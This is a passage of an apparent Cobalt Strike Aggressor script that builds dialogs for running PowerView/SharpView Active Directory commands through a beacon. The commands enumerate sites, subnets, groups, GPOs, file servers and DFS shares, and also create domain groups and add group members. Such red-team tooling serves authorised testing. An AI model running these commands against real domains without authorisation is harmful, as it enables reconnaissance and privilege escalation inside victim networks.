            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainSite'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Search for all sites or specific site objects in AD");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'GPLink', 'GPLink');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'Raw', 'Raw');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainsubnet{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainSubnet", %(execmethod => "PowerPick", Identity => "", SiteName => "", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMaks => "", Tombstone => "false", FindOne => "false", Credential => "", Raw => "false"), lambda({
        if ($2 eq  'Help'){
            helpgetdomainsubnet()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainSubnet via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainSubnet'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainSubnet via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainSubnet'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainSubnet via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainSubnet'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Search for all subnets or specific subnets objects in AD");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'SiteName', 'SiteName');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_checkbox($dialog, 'Raw', 'Raw');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainsid{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainSID", %(execmethod => "PowerPick", Domain => "", Server => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainsid()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainSID via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainSID'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainSID via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainSID'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainSID via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainSID'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns the SID for the current domain or the specified domain");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaingroup{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainGroup", %(execmethod => "PowerPick", Identity => "", MemberIdentity => "", AdminCount => "false", GroupScope => "", GroupProperty => "", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", Tombstone => "false", FindOne => "false", Credential => "", Raw => "false"), lambda({
        if ($2 eq  'Help'){
            helpgetdomaingroup()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainGroup via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainGroup via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainGroup via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainGroup'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all groups or specific group objects in AD");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'MemberIdentity', 'MemberIdentity');
    drow_text($dialog, 'GroupScope', 'GroupScope');
    drow_text($dialog, 'GroupProperty', 'GroupProperty');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'AdminCount', 'AdminCount');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'Raw', 'Raw');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub newdomaingroup{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 New-DomainGroup", %(execmethod => "PowerPick", SamAccountName => "", Name => "", DisplayName => "", Description => "", Domain => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpnewdomaingroup()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView New-DomainGroup via PowerPick');
            bpowerpick($bid, ''.$creds.'New-DomainGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView New-DomainGroup via PowerShell');
            bpowershell($bid, ''.$creds.'New-DomainGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView New-DomainGroup via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'New-DomainGroup'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Creates a new domain group (assuming appropriate permissions) and returns the group object");
    drow_text($dialog, 'SamAccountName', 'SamAccountName');
    drow_text($dialog, 'Name', 'Name');
    drow_text($dialog, 'DisplayName', 'DisplayName');
    drow_text($dialog, 'Description', 'Description');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainmanagedsecuritygroup{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainManagedSecurityGroup", %(execmethod => "PowerPick", Domain => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainmanagedsecuritygroup()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainManagedSecurityGroup via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainManagedSecurityGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainManagedSecurityGroup via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainManagedSecurityGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainManagedSecurityGroup via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainManagedSecurityGroup'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns all security groups in the current (or target) domain that have a manager set");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaingroupmember{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainGroupMember", %(execmethod => "PowerPick", Identity => "", Domain => "", Recurse => "false", RecurseUsingMatchingRule => "false", LDAPFilter => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaingroupmember()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainGroupMember via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainGroupMember via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainGroupMember via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainGroupMember'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return the members of a specific domain group");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Recurse', 'Recurse');
    drow_checkbox($dialog, 'RecurseUsingMatchingRule', 'RecurseUsingMatchingRule');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub adddomaingroupmember{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Add-DomainGroupMember", %(execmethod => "PowerPick", Identity => "", Members => "", Domain => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpadddomaingroupmember()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Add-DomainGroupMember via PowerPick');
            bpowerpick($bid, ''.$creds.'Add-DomainGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Add-DomainGroupMember via PowerShell');
            bpowershell($bid, ''.$creds.'Add-DomainGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Add-DomainGroupMember via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Add-DomainGroupMember'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'Members', 'Members');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainfileserver{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainFileServer", %(execmethod => "PowerPick", Domain => "", LDAPFilter => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainfileserver()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainFileServer via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainFileServer'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainFileServer via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainFileServer'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainFileServer via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainFileServer'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns a list of servers likely functioning as file servers");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaindfsshare{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainDFSShare", %(execmethod => "PowerPick", Domain => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaindfsshare()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainDFSShare via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainDFSShare'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainDFSShare via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainDFSShare'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainDFSShare via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainDFSShare'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns a list of all fault-tolerant distributed file systems for the current (or specified) domains");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

#---------------
#GPO Functions
#---------------
sub getdomaingpo{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainGPO", %(execmethod => "PowerPick", Identity => "", ComputerIdentity => "", UserIdentity => "", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", Tombstone => "false", FindOne => "false", Credential => "", Raw => "false"), lambda({
        if ($2 eq  'Help'){
            helpgetdomaingpo()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainGPO via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainGPO'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainGPO via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainGPO'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainGPO via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainGPO'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all GPOs or specific GPO objects in AD");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'ComputerIdentity', 'ComputerIdentity');
    drow_text($dialog, 'UserIdentity', 'UserIdentity');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_checkbox($dialog, 'Raw', 'Raw');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaingpolocalgroup{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainGPOLocalGroup", %(execmethod => "PowerPick", Identity => "", ResolveMembersToSIDs => "false", Domain => "", LDAPFilter => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaingpolocalgroup()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainGPOLocalGroup via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainGPOLocalGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainGPOLocalGroup via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainGPOLocalGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainGPOLocalGroup via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainGPOLocalGroup'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences. Also return their user membership mappings, if they exist");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
